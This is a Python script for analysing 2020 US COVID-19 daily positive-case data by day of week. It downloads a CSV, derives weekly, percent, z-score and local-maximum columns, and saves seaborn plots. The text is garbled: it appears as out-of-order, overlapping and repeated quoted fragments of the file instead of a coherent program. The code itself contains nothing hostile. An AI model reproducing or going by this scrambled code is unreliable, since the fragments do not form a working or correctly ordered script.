IMPORTS # =========================================================================== #", "data frame. DEBUG and preview(df, summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame): fig", "processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) # Debug data frame. DEBUG and preview(df,", "frame for reuse. return df # -- Data Processing: Load -- # #", "-- Utilities -- # def lag_delta(series, period): return series - series.shift(period) def lead_delta(series,", "'Thursday', 'Friday', 'Saturday', ] # -- Debugging -- # DEBUG = True #", "the default figure size. sns.set( style='darkgrid', rc={'figure.figsize': (16, 9)}, ) def summarize_by_dow(df: pd.DataFrame):", "preview(df, rename_columns.__name__) # Return data frame for reuse. return df # -- Data", "'Wednesday', 'Thursday', 'Friday', 'Saturday', ] # -- Debugging -- # DEBUG = True", "= df.index.year df['month'] = df.index.month df['week'] = df.index.week df['dow'] = df.index.day_name() df['dowIndex'] =", "# Define the module's API -- the list of exportable objects (classes, #", "and preview(df, summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame): fig = plt.figure() ax", "ax.set_ylabel('Count of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow.__name__) # plt.show()", "# plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) #", "DOW = [ 'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', ] # --", "'weekly' COLUMNS = { 'positive': 'pos', 'negative': 'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease', }", "\"wild import\" (`from field import *`). __all__ = [ 'DEBUG', ] # ===========================================================================", "preview(df, transform_data.__name__) # Return data frame for reuse. return df def add_columns(df: pd.DataFrame):", "# Format date. df.date = pd.to_datetime(df.date, format='%Y%m%d') # Set the date as the", "fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.countplot( data=df, x='dow',", "data and creating visual summaries for this study. \"\"\" # =========================================================================== # #", "__credits__ = ['Robert (Bob) <NAME>'] __created_date__ = 'Sep 16, 2020' __modified_date__ = 'Sep", "defaults. Set the default figure size. sns.set( style='darkgrid', rc={'figure.figsize': (16, 9)}, ) def", "return series - series.shift(period) def lead_delta(series, period): return series.shift(-period) - series def local_max(row):", "-- # def main(): df = extract_data() df = transform_data(df) visualize_data(df) # ===========================================================================", "data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily", "y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive", "on='week', ) df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, )", "copy of the extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) # Debug data frame.", "plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): # Use seaborn style defaults. Set the default figure", "2020 | USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Percent of", "EXECUTION # =========================================================================== # # -- Main Program -- # # If this", "def lead_delta(series, period): return series.shift(-period) - series def local_max(row): if row['day1LagDelta'] > 0", "functions, etc.) -- when performing a \"wild import\" (`from field import *`). __all__", "x='dow', y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New", "df.index.day_name() df['dowIndex'] = df.index.dayofweek # Add group-summarization columns. df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg( {", "zScore(x, mean, std): return (x - mean) / std # -- Main Program", "= True # -- Filesytem -- # ROOT_DIR = os.path.join(os.getcwd(), '..') DATA_DIR =", "default figure size. sns.set( style='darkgrid', rc={'figure.figsize': (16, 9)}, ) def summarize_by_dow(df: pd.DataFrame): fig", "frame. DEBUG and preview(df, transform_data.__name__) # Return data frame for reuse. return df", "COLUMNS = { 'positive': 'pos', 'negative': 'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease', } DOW", "data frame for reuse. return df # -- Data Processing: Transform -- #", "METADATA # =========================================================================== # __author__ = 'Robert (Bob) <NAME>' __credits__ = ['Robert (Bob)", "return True else: return False def local_min(row): if row['day1LagDelta'] < 0 and row['day1LeadDelta']", "df # -- Data Processing: Extract -- # def extract_data() -> pd.DataFrame: #", "Load -- # # -- Utilities -- # def lag_delta(series, period): return series", ") df = pd.merge( df, df_weekly, how='left', on='week', ) df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease)", "Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def", "Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score of Weekly Count of Cases') # Debug data", "columns. df.rename(columns=COLUMNS, inplace=True) # Save a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv',", "summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)])", "df = pd.read_csv(SOURCE_URL) # Save a copy of the extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv',", "> 0: return True else: return False def percent(num, denom): return 100 *", "objects (classes, # functions, etc.) -- when performing a \"wild import\" (`from field", "# =========================================================================== # # -- Python Standard Library -- # import os #", "plt.subplot(111) sns.countplot( data=df, x='dow', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA |", "# =========================================================================== # __author__ = 'Robert (Bob) <NAME>' __credits__ = ['Robert (Bob) <NAME>']", "# # -- Data -- # DAILY = 'daily' WEEKLY = 'weekly' COLUMNS", "of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png')", "# =========================================================================== # # Define the module's API -- the list of exportable", "df = rename_columns(df) df = add_columns(df) # Debug data frame. DEBUG and preview(df,", "local_max(row): if row['day1LagDelta'] > 0 and row['day1LeadDelta'] < 0: return True else: return", "2020' # =========================================================================== # # EXPORTS # =========================================================================== # # Define the module's", "and preview(df, add_columns.__name__) # Return data frame for reuse. return df def rename_columns(df:", "# plt.show() # Debug data frame. DEBUG and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults():", "# -- Data Processing: Transform -- # def transform_data(df: pd.DataFrame) -> pd.DataFrame: df", "DEBUG and preview(df, add_columns.__name__) # Return data frame for reuse. return df def", "| Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Local Maxima of", "pd.to_datetime(df.date, format='%Y%m%d') # Set the date as the DataFrame's index. df = df.set_index('date')", "plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.countplot( data=df,", "= plt.subplot(111) sns.boxplot( data=df, x='dow', y='posIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 |", "frame. DEBUG and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): # Use seaborn style defaults.", "import matplotlib.pyplot as plt import pandas as pd import seaborn as sns #", "data frame. DEBUG and preview(df, transform_data.__name__) # Return data frame for reuse. return", "# Add delta columns. df['day1LagDelta'] = lag_delta(df.posIncrease, 1) df['day1LeadDelta'] = lead_delta(df.posIncrease, 1) #", ") def summarize_by_dow(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow',", "return False def local_min(row): if row['day1LagDelta'] < 0 and row['day1LeadDelta'] > 0: return", "= plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='posIncrease', order=DOW, ) ax.set_title('COVID-19 |", "pd.DataFrame, func_name: str): print(f'INSIDE {func_name}(): type =', type(df).__name__) print(df.head(5)) def zScore(x, mean, std):", "the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) # Debug data frame. DEBUG and", "# EXPORTS # =========================================================================== # # Define the module's API -- the list", "pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data frame. DEBUG and", "-> pd.DataFrame: # Download source data as CSV from an API. df =", "=========================================================================== # # Define the module's API -- the list of exportable objects", "reuse. return df # -- Data Processing: Transform -- # def transform_data(df: pd.DataFrame)", "df.date = pd.to_datetime(df.date, format='%Y%m%d') # Set the date as the DataFrame's index. df", "def percent(num, denom): return 100 * num / denom def preview(df: pd.DataFrame, func_name:", "DEBUG = True # -- Filesytem -- # ROOT_DIR = os.path.join(os.getcwd(), '..') DATA_DIR", "DEBUG and preview(df, rename_columns.__name__) # Return data frame for reuse. return df #", "# Rename columns. df.rename(columns=COLUMNS, inplace=True) # Save a copy of the processed data.", "# __author__ = 'Robert (Bob) <NAME>' __credits__ = ['Robert (Bob) <NAME>'] __created_date__ =", "for reuse. return df def add_columns(df: pd.DataFrame): # Format date. df.date = pd.to_datetime(df.date,", "summarize_by_dow(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='posIncrease', order=DOW,", "# =========================================================================== # # METADATA # =========================================================================== # __author__ = 'Robert (Bob) <NAME>'", "summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111)", "= transform_data(df) visualize_data(df) # =========================================================================== # # MAIN EXECUTION # =========================================================================== # #", "< 0: return True else: return False def local_min(row): if row['day1LagDelta'] < 0", "# IMPORTS # =========================================================================== # # -- Python Standard Library -- # import", "# Debug data frame. DEBUG and preview(df, transform_data.__name__) # Return data frame for", "= df.index.dayofweek # Add group-summarization columns. df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum',", "pd.DataFrame: # Rename columns. df.rename(columns=COLUMNS, inplace=True) # Save a copy of the processed", "performing a \"wild import\" (`from field import *`). __all__ = [ 'DEBUG', ]", "study. \"\"\" # =========================================================================== # # METADATA # =========================================================================== # __author__ = 'Robert", "'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease', } DOW = [ 'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday',", "-- # DEBUG = True # -- Filesytem -- # ROOT_DIR = os.path.join(os.getcwd(),", "summarize_by_dow_percent(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW,", "add_columns(df: pd.DataFrame): # Format date. df.date = pd.to_datetime(df.date, format='%Y%m%d') # Set the date", "of Week') ax.set_ylabel('Count of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow.__name__)", "if row['day1LagDelta'] > 0 and row['day1LeadDelta'] < 0: return True else: return False", "ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020", "# Add local extrema columns. df['localMaximum'] = df.apply(local_max, axis=1) df['localMinimum'] = df.apply(local_min, axis=1)", "Return data frame for reuse. return df def add_columns(df: pd.DataFrame): # Format date.", "Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Percent of Weekly Count of Cases') # Debug data", "df['year'] = df.index.year df['month'] = df.index.month df['week'] = df.index.week df['dow'] = df.index.day_name() df['dowIndex']", "df def rename_columns(df: pd.DataFrame) -> pd.DataFrame: # Rename columns. df.rename(columns=COLUMNS, inplace=True) # Save", "WEEKLY = 'weekly' COLUMNS = { 'positive': 'pos', 'negative': 'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease':", "= zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) # Add delta columns. df['day1LagDelta'] = lag_delta(df.posIncrease,", "= '../data' RESULTS_DIR = '../results' # -- URLs -- # SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv'", "and preview(df, summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df)", "Debug data frame. DEBUG and preview(df, summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame):", "df_weekly, how='left', on='week', ) df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease, df.meanWeeklyPosIncrease,", "Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Local Maxima of Cases') # Debug", "2020' __modified_date__ = 'Sep 16, 2020' # =========================================================================== # # EXPORTS # ===========================================================================", "DEBUG and preview(df, visualize_data.__name__) # Return data frame for reuse. return df #", "Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Local Maxima of Cases') # Debug data", "SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== # # FUNCTIONS # =========================================================================== # # --", "data frame. DEBUG and preview(df, rename_columns.__name__) # Return data frame for reuse. return", "df['dow'] = df.index.day_name() df['dowIndex'] = df.index.dayofweek # Add group-summarization columns. df_weekly = df.groupby('week',", "- mean) / std # -- Main Program -- # def main(): df", "the module's API -- the list of exportable objects (classes, # functions, etc.)", "frame. DEBUG and preview(df, summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame): fig =", "(x - mean) / std # -- Main Program -- # def main():", "- series.shift(period) def lead_delta(series, period): return series.shift(-period) - series def local_max(row): if row['day1LagDelta']", "# Download source data as CSV from an API. df = pd.read_csv(SOURCE_URL) #", "df.apply(local_max, axis=1) df['localMinimum'] = df.apply(local_min, axis=1) # Save a copy of the processed", "# def main(): df = extract_data() df = transform_data(df) visualize_data(df) # =========================================================================== #", "Main Program -- # # If this module is in the main module,", "plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year", "data frame. DEBUG and preview(df, visualize_data.__name__) # Return data frame for reuse. return", "Debug data frame. DEBUG and preview(df, extract_data.__name__) # Return data frame for reuse.", "'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease', } DOW = [ 'Sunday', 'Monday', 'Tuesday', 'Wednesday',", "# =========================================================================== # # CONSTANTS # =========================================================================== # # -- Data -- #", "order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive Cases')", "< 0 and row['day1LeadDelta'] > 0: return True else: return False def percent(num,", "marker='o', ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive Cases')", "def extract_data() -> pd.DataFrame: # Download source data as CSV from an API.", "of Week') ax.set_ylabel('Count of Local Maxima of Cases') # Debug data frame. DEBUG", "| Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Day of Week')", "transform_data(df) visualize_data(df) # =========================================================================== # # MAIN EXECUTION # =========================================================================== # # --", "sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA |", "# =========================================================================== # # EXPORTS # =========================================================================== # # Define the module's API", "FUNCTIONS # =========================================================================== # # -- Data Analytics -- # def plot_series(df: pd.DataFrame):", "Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of Cases') ax.xaxis_date() # plt.show() # Debug data frame.", "'posIncrease', } DOW = [ 'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', ]", "Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def", "df = df.set_index('date') # Add date-derived columns. df['date'] = df.index.date df['year'] = df.index.year", "return True else: return False def percent(num, denom): return 100 * num /", "{func_name}(): type =', type(df).__name__) print(df.head(5)) def zScore(x, mean, std): return (x - mean)", "1) # Add local extrema columns. df['localMaximum'] = df.apply(local_max, axis=1) df['localMinimum'] = df.apply(local_min,", "Add delta columns. df['day1LagDelta'] = lag_delta(df.posIncrease, 1) df['day1LeadDelta'] = lead_delta(df.posIncrease, 1) # Add", "Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score", "-- Main Program -- # # If this module is in the main", "=========================================================================== # # -- Main Program -- # # If this module is", "(16, 9)}, ) def summarize_by_dow(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot(", "2020 | USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of", "= pd.to_datetime(df.date, format='%Y%m%d') # Set the date as the DataFrame's index. df =", "df = pd.merge( df, df_weekly, how='left', on='week', ) df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease']", "sns.countplot( data=df, x='dow', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily", "'pos', 'negative': 'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease', } DOW = [ 'Sunday', 'Monday',", "local extrema columns. df['localMaximum'] = df.apply(local_max, axis=1) df['localMinimum'] = df.apply(local_min, axis=1) # Save", "DATA_DIR = '../data' RESULTS_DIR = '../results' # -- URLs -- # SOURCE_URL =", "EXPORTS # =========================================================================== # # Define the module's API -- the list of", "reuse. return df def add_columns(df: pd.DataFrame): # Format date. df.date = pd.to_datetime(df.date, format='%Y%m%d')", "= os.path.join(os.getcwd(), '..') DATA_DIR = '../data' RESULTS_DIR = '../results' # -- URLs --", "2020 | USA | Daily New Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of Cases') ax.xaxis_date()", "0 and row['day1LeadDelta'] < 0: return True else: return False def local_min(row): if", "list of exportable objects (classes, # functions, etc.) -- when performing a \"wild", "| USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Cases')", "-- Python Standard Library -- # import os # -- 3rd Party --", "date as the DataFrame's index. df = df.set_index('date') # Add date-derived columns. df['date']", "Utilities -- # def lag_delta(series, period): return series - series.shift(period) def lead_delta(series, period):", "/ denom def preview(df: pd.DataFrame, func_name: str): print(f'INSIDE {func_name}(): type =', type(df).__name__) print(df.head(5))", "visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data frame. DEBUG", "{ 'positive': 'pos', 'negative': 'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease', } DOW = [", "# # Define the module's API -- the list of exportable objects (classes,", "fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='posIncrease', order=DOW, ) ax.set_title('COVID-19", "source data as CSV from an API. df = pd.read_csv(SOURCE_URL) # Save a", "3rd Party -- # import matplotlib.dates as mpl_dates import matplotlib.pyplot as plt import", "Count of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow_percent.__name__) # plt.show()", "data=df, x='date', y='posIncrease', marker='o', ) ax.set_title('COVID-19 | Year 2020 | USA | Daily", "and preview(df, extract_data.__name__) # Return data frame for reuse. return df # --", "# Save a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) #", "# -- Data Processing: Load -- # # -- Utilities -- # def", "and preview(df, transform_data.__name__) # Return data frame for reuse. return df def add_columns(df:", "series def local_max(row): if row['day1LagDelta'] > 0 and row['day1LeadDelta'] < 0: return True", "data frame. DEBUG and preview(df, summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame): fig", "for processing data and creating visual summaries for this study. \"\"\" # ===========================================================================", "# If this module is in the main module, call the main() function.", "for reuse. return df # -- Data Processing: Load -- # # --", "main module for processing data and creating visual summaries for this study. \"\"\"", "df # -- Data Processing: Load -- # # -- Utilities -- #", "DEBUG and preview(df, extract_data.__name__) # Return data frame for reuse. return df #", "= ['Robert (Bob) <NAME>'] __created_date__ = 'Sep 16, 2020' __modified_date__ = 'Sep 16,", "df.index.week df['dow'] = df.index.day_name() df['dowIndex'] = df.index.dayofweek # Add group-summarization columns. df_weekly =", "mean, std): return (x - mean) / std # -- Main Program --", "# Debug data frame. DEBUG and preview(df, summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df:", "lag_delta(df.posIncrease, 1) df['day1LeadDelta'] = lead_delta(df.posIncrease, 1) # Add local extrema columns. df['localMaximum'] =", "plt import pandas as pd import seaborn as sns # =========================================================================== # #", "of exportable objects (classes, # functions, etc.) -- when performing a \"wild import\"", "etc.) -- when performing a \"wild import\" (`from field import *`). __all__ =", "sns.boxplot( data=df, x='dow', y='posIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA |", "pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW, )", "(`from field import *`). __all__ = [ 'DEBUG', ] # =========================================================================== # #", "return 100 * num / denom def preview(df: pd.DataFrame, func_name: str): print(f'INSIDE {func_name}():", "lead_delta(df.posIncrease, 1) # Add local extrema columns. df['localMaximum'] = df.apply(local_max, axis=1) df['localMinimum'] =", "os.path.join(os.getcwd(), '..') DATA_DIR = '../data' RESULTS_DIR = '../results' # -- URLs -- #", "ax = plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df, x='date', y='posIncrease', marker='o', ) ax.set_title('COVID-19", "data frame for reuse. return df # -- Data Processing: Load -- #", "[ 'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', ] # -- Debugging --", "= plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 |", "summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111)", "else: return False def percent(num, denom): return 100 * num / denom def", "16, 2020' __modified_date__ = 'Sep 16, 2020' # =========================================================================== # # EXPORTS #", "ax.set_ylabel('Count of Cases') ax.xaxis_date() # plt.show() # Debug data frame. DEBUG and preview(df,", "USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Local Maxima", "# Add date-derived columns. df['date'] = df.index.date df['year'] = df.index.year df['month'] = df.index.month", "figure size. sns.set( style='darkgrid', rc={'figure.figsize': (16, 9)}, ) def summarize_by_dow(df: pd.DataFrame): fig =", "df.index.dayofweek # Add group-summarization columns. df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease':", "mpl_dates import matplotlib.pyplot as plt import pandas as pd import seaborn as sns", "= 'weekly' COLUMNS = { 'positive': 'pos', 'negative': 'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease',", "Debugging -- # DEBUG = True # -- Filesytem -- # ROOT_DIR =", "API -- the list of exportable objects (classes, # functions, etc.) -- when", "delta columns. df['day1LagDelta'] = lag_delta(df.posIncrease, 1) df['day1LeadDelta'] = lead_delta(df.posIncrease, 1) # Add local", "return df # -- Data Processing: Load -- # # -- Utilities --", "DAILY = 'daily' WEEKLY = 'weekly' COLUMNS = { 'positive': 'pos', 'negative': 'neg',", "Data Processing: Extract -- # def extract_data() -> pd.DataFrame: # Download source data", "inplace=True) # Save a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, )", "= plt.subplot(111) sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 |", "= df.set_index('date') # Add date-derived columns. df['date'] = df.index.date df['year'] = df.index.year df['month']", "= '../results' # -- URLs -- # SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== #", "import pandas as pd import seaborn as sns # =========================================================================== # # CONSTANTS", "Cases') # Debug data frame. DEBUG and preview(df, summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def", "df['month'] = df.index.month df['week'] = df.index.week df['dow'] = df.index.day_name() df['dowIndex'] = df.index.dayofweek #", "# Return data frame for reuse. return df # -- Data Processing: Load", "ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Day of", "DEBUG and preview(df, summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame): fig = plt.figure()", "period): return series - series.shift(period) def lead_delta(series, period): return series.shift(-period) - series def", "def local_max(row): if row['day1LagDelta'] > 0 and row['day1LeadDelta'] < 0: return True else:", "and preview(df, summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame): fig = plt.figure() ax", "df['date'] = df.index.date df['year'] = df.index.year df['month'] = df.index.month df['week'] = df.index.week df['dow']", "std): return (x - mean) / std # -- Main Program -- #", "Use seaborn style defaults. Set the default figure size. sns.set( style='darkgrid', rc={'figure.figsize': (16,", "ax.set_ylabel('Count of Local Maxima of Cases') # Debug data frame. DEBUG and preview(df,", "series - series.shift(period) def lead_delta(series, period): return series.shift(-period) - series def local_max(row): if", "df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) # Add delta columns. df['day1LagDelta'] = lag_delta(df.posIncrease, 1) df['day1LeadDelta']", "False def percent(num, denom): return 100 * num / denom def preview(df: pd.DataFrame,", "# # CONSTANTS # =========================================================================== # # -- Data -- # DAILY =", "else: return False def local_min(row): if row['day1LagDelta'] < 0 and row['day1LeadDelta'] > 0:", "extract_data() -> pd.DataFrame: # Download source data as CSV from an API. df", "seaborn as sns # =========================================================================== # # CONSTANTS # =========================================================================== # # --", "transform_data(df: pd.DataFrame) -> pd.DataFrame: df = rename_columns(df) df = add_columns(df) # Debug data", "Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Cases') # Debug data frame. DEBUG and", "# FUNCTIONS # =========================================================================== # # -- Data Analytics -- # def plot_series(df:", "| USA | Daily New Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of Cases') ax.xaxis_date() #", "'../results' # -- URLs -- # SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== # #", "summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data frame. DEBUG and preview(df, visualize_data.__name__) # Return data frame", "'mean', 'stdWeeklyPosIncrease': 'std', }, ) df = pd.merge( df, df_weekly, how='left', on='week', )", "the DataFrame's index. df = df.set_index('date') # Add date-derived columns. df['date'] = df.index.date", "seaborn style defaults. Set the default figure size. sns.set( style='darkgrid', rc={'figure.figsize': (16, 9)},", "def add_columns(df: pd.DataFrame): # Format date. df.date = pd.to_datetime(df.date, format='%Y%m%d') # Set the", "df = add_columns(df) # Debug data frame. DEBUG and preview(df, transform_data.__name__) # Return", "plt.subplot(111) sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA", "Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count", "(Bob) <NAME>'] __created_date__ = 'Sep 16, 2020' __modified_date__ = 'Sep 16, 2020' #", "Data -- # DAILY = 'daily' WEEKLY = 'weekly' COLUMNS = { 'positive':", "# Return data frame for reuse. return df def add_columns(df: pd.DataFrame): # Format", "'Sep 16, 2020' # =========================================================================== # # EXPORTS # =========================================================================== # # Define", "# MAIN EXECUTION # =========================================================================== # # -- Main Program -- # #", "df['week'] = df.index.week df['dow'] = df.index.day_name() df['dowIndex'] = df.index.dayofweek # Add group-summarization columns.", "{ 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std', }, ) df = pd.merge( df,", "sns.lineplot( data=df, x='date', y='posIncrease', marker='o', ) ax.set_title('COVID-19 | Year 2020 | USA |", "ax.set_xlabel('Day of Week') ax.set_ylabel('Percent of Weekly Count of Cases') # Debug data frame.", "import *`). __all__ = [ 'DEBUG', ] # =========================================================================== # # IMPORTS #", "frame. DEBUG and preview(df, summarize_by_dow.__name__) # plt.show() 